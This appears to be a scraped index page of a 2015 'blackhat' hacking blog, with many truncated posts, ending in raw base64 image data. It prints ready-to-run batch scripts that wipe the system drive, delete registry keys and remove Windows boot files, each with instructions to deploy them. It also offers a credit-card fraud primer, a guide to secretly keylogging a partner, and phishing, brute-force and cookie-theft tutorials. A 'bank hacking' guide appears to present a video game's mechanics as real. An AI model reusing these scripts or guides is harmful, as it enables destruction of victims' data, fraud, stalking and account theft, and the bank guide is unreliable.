Anonymous

WELCOME TO BLACKHAT COMMUNITY! We are Anonymous, We are legion, We do not forgive, We do not forget, United as one!

BLACK HAT

BLACK HAT
REMEMBER ME

Tuesday, 6 October 2015

TOP TEN HACKER TOOLS LIST!

 The 2015 Concise Top Ten Hacker Tools List!


This 'TOP TEN' is based on the Kali Linux Distro Hacker Tools 'Top Ten'. Links below take you to videos, books, tutorials and much more!
[...more...]

Nmap

Port Scanner

Nmap is an abbreviation of 'Network Mapper', as is a very well known free open source hackers tool. Nmap is used for network discovery and security auditing. Many system admins use nmap for network inventory, open ports, managing service upgrade schedules, and monitoring host or service uptime. The tool uses raw IP packets in creative ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions and possible patches) and what type and version of packet filters/ firewalls are being used by the target.[...more...]
Nmap Videos
Nmap Books
Similiar Tools
[...more...]

Metasploit

Vulnerability Exploitation Tool

The Metasploit Project is a hugely popular pentesting or hacking tool that is used by cybersecurity professionals and ethical hackers. Metasploit is essentially a computer security project that supplies information about known security vulnerabilities and helps to formulate penetration testing and IDS testing.[...more...]
Metasploit Videos
Metasploit Books
Similiar Tools
[...more...]
Read more »
Posted by Unknown at 15:31 23 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

HOW TO HACK CREDIT CARD

This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

REMEMBER: WE ARE BLACKHAT! WE DO NOT FORGIVE! WE DO NOT FORGET!
THIS IS BROXKEY!

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Read more »
Posted by Unknown at 15:23 103 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Monday, 24 August 2015

How to create a blue screen of Death with Notepad


How to create a blue screen of  Death with Notepad


Image result for computer virus
All you need to do is to copy the codes , paste it in any notepad or text file, then save the text file with anyname.vbs , and yeah don't forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANENTLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
The blue screen of Death [this might be dangerous] HAHA
Code:
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Broxkey!!
Posted by Unknown at 18:47 10 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Delete Key Registry Files

Delete Key Registry Files

All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANENTLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*
Code:
CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. Have a nice day.
GOTO MESSAGE
HAHA.. Broxkey!!
Posted by Unknown at 18:00 7 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

How to create a virus that deactivates an OS

How to create a virus that deactivates an OS

Here are the steps you should follow to make the virus:
This virus will stop and prevent a computer from starting up and the only solution would be to reinstall windows.
Warning : never try it on your computer.
open up notepad and type in the following
Picture of Hacking With Notepad
 
del "C:windows\SYSTEM32\bootok"
/Q/S >nul
del "C:windows\SYSTEM32\bootvid.dll"
del "C:windows\SYSTEM32\bootvrfy"
After you type these save it as "any name you want ".bat
Please let me know if it works.
Broxkey!!
Posted by Unknown at 17:57 9 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Top 10 Notorious Black Hat Hackers

 Top 10 Notorious Black Hat Hackers
Kevin Poulsen
a.k.a. Dark Dante
Kevin-Poulsen
The notorious ’80s black hat hacker, Kevin Poulsen, gained recognition for his hacking of the telephone lines for LA radio station KIIS-FM, securing himself a place as the 102nd caller and winning a brand new Porsche 944, among other prizes. Law enforcement dubbed Poulsen the “Hannibal Lecter of computer crime.” Poulsen went underground as a fugitive when the FBI began its search for him, but in 1991, he was finally captured.
He pleaded guilty to seven counts of mail, wire and computer fraud, money laundering, obstruction of justice, and for obtaining information on covert businesses run by the FBI. Kevin Poulsen was sentenced to 51 months in prison (4 years and 3 months), which was the longest sentence ever given for hacking at the time. However, since serving time, Poulsen has worked as a journalist and is now a senior editor for Wired News. Poulsen’s most note-worthy article details his work on identifying 744 sex offenders with MySpace profiles.

Albert Gonzalez

Albert2 Crop Small
Cyber-criminal Albert Gonzalez has been accused of masterminding the biggest ATM and credit card theft in history; from 2005 to 2007, he and his cybergroup had allegedly sold more than 170 million card and ATM numbers. Gonzalez’s team used SQL injection techniques to create malware backdoors on several corporate systems in order to launch packet-sniffing (specifically, ARP Spoofing) attacks, allowing him to steal computer data from internal corporate networks. When he was arrested, authorities seized $1.6 million in cash including $1.1 million found in plastic bags placed in a three-foot drum which had been buried in his parents’ backyard. In 2010, Gonzalez was sentenced to 20 years in federal prison

Read more »
Posted by Unknown at 17:00 12 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Monday, 13 July 2015

Facebook Phishing ( Undetectable)

Phishing is the attempt to acquire sensitive
information such as usernames, passwords,
and credit card details (and sometimes,
indirectly, money) by masquerading as a
trustworthy entity in an electronic
communication.
New post: Advanced Level Facebook Desktop
Phishing Method -
Read more »
Posted by Unknown at 13:44 22 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Labels: Phishing method 2015

Hack Wi-Fi with CMD

Sometimes you might be frustrated especially
when your system detect a wifi network but you
are restricted from accessing it due to users
password, now i can teach you a simple trick to
hack the password.
step one
Go to command prompt,
Read more »
Posted by Unknown at 13:35 30 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Labels: Hacking Wi-Fi

Wednesday, 8 July 2015

Hacking A Bank Account



Bank Hacking

Despite the risks involved, hacking a Bank is relatively easy. As long as you are fast, by following this guide you should have no problems. Before you start, you will need to know an Account Number at the bank you want to hack, your Uplink Bank Account number, and the IP of Uplink International Bank.

1. Connect to the bank, with Inter NIC as your first bounce, and bypass the monitor and proxy with Level 5 Bypassers.
2. Break into the account you want to steal from, using the account number as the user name, and the password breaker to get the password. You should not have a trace on you because of the monitor bypass.
3. Enter the transfer screen and transfer money to your Uplink bank account

Read more »
Posted by Unknown at 18:56 776 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

How to change your private IP address in Windows

Step 1: Navigate to the Network and Sharing Center – Click the the Windows Start Menu, select the Control Panel from the resulting pop-up box, and click the View network status and tasks option housed within the Network and Internet section on the left-hand side of the window.

IP Address control panel

Read more »
Posted by Unknown at 18:48 3 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

How to Remotely Install a Keylogger onto Your Girlfriend's Computer

Several of you have you have emailed me asking whether it's possible to install a keylogger on a victim's computer using Metasploit. The answer is a resounding "YES"!
So, by popular request, in this guide I'll show you how to install a keylogger on your girlfriend's, boyfriend's, wife's, or husband's computer.....
For those of you wondering what a keylogger is, the simple answer is that it's a piece of software or hardware that captures every keystroke and saves them for retrieval by you, the attacker. These types of devices have long been used by hackers to capture logins, passwords, social security numbers, etc. Here we will use it to capture the keystrokes of a cheating girlfriend.
Fire up Metasploit and let's get started.
Like in my last article on disabling antivirus software, I'm assuming that you've successfully installed Metasploit's powerful listener/rootkit on the target system. You can also check my earlier articles for a variety of ways to get it installed.
Read more »
Posted by Unknown at 18:39 4 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

How to Hack Email Account with Cookie stealing [For Newbies]


How to hack Email accounts:

If you are a newbie and don't know about cookie, then for your information, Cookie is a piece of text stored on user computer by websites visited by the user. This stored cookie is used by web server to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this steeled cookie in your browser, you can imitate victim identity to web server and enter his Email account easily. This is called Session Hijacking. Thus, you can easily hack Email account using such Cookie stealing hacks.

Tools needed for Cookie stealing attack:

Read more »
Posted by Unknown at 18:22 3 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

How to Brute Force hacking Facebook in Kali Linux

Hello all, Want to learn facebook hacking?
 facebook hacking with  Brute force python scripting

We need a tool:

1. Python Script - facebook.py
2. Wordlist - e.g. pass.txt or wordlist.txt

I have already installed python or Install python after installing

step 1.

[*] root@lhackg:~#apt-get install python-mechanize



step 2.

now downloading facebook.py

Read more »
Posted by Unknown at 18:13 29 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Crack Online Passwords with Tamper Data & THC Hydra



Welcome back..
Its BROXKEY Again!!!

Not too long ago, I showed how to find various online devices using Shodan. As you remember, Shodan is a different type of search engine. Instead of indexing the content of websites, it pulls the banner of web servers on all types of online devices and then indexes the content of those banners.
This info can be from any type of device including web servers, routers, webcams, SCADA systems, home security systems, and basically anything that has a web interface, which in 2014, means just about everything.
I mentioned in my first Shodan tutorial that you can often access these devices by simply using the default username and password, as administrators are often lazy and neglectful. The question we want to address in this tutorial is—what do we do when the site requires credentials and the defaults don't work?
There is tool that is excellent for cracking online passwords and it is called THC-Hydra. Fortunately, it is built into our Kali distribution, so we don't need to download, install, or compile anything to use it.

 
 

Step 1: Download & Install Tamper Data

Read more »
Posted by Unknown at 18:04 4 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Sunday, 28 June 2015

HOW TO HACK EMAIL ACCOUNTS PASSWORDS

"How to hack email accounts passwords"?
 So many people have asked that question,and honestly its a dumb one,.There are many ways to hack an email account passwords but i am covering here 5 of them:
1.Phishing
2.Keylogging
3.Brute forcing
4.Social engineering
5.Guessing the secret question

Phishing:

This is the most easiest way to hack an email account password Phishing is a way of saying keylogger but in an other meaning.
Read more »
Posted by Unknown at 19:02 4 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Hack Facebook Account Using Phishing Method 2015

Phishing.

What is phishing and how is it done??

Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one. 

Basically all you are doing is getting your target to login to your fake login page and you will be sent their Facebook email and password.


STEP 1:Creating Phishing.php file : Read more
Read more »
Posted by Unknown at 18:27 26 comments:
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

Top 5 Hacking Software Free Download for PC


Top 5 Hacking Software Free Download for PC by BROXKEY!
Sometimes it becomes necessary to crack the passwords or to have some knowledge about hacking. In this order various tools or software help you to do so. But it becomes quite hectic to find a suitable or best tool for your system. In this order, we have brought a list of Top 5 Hacking Software which you can download for free from internet. Let’s check out the list:

NMAP
data:image/png;base64,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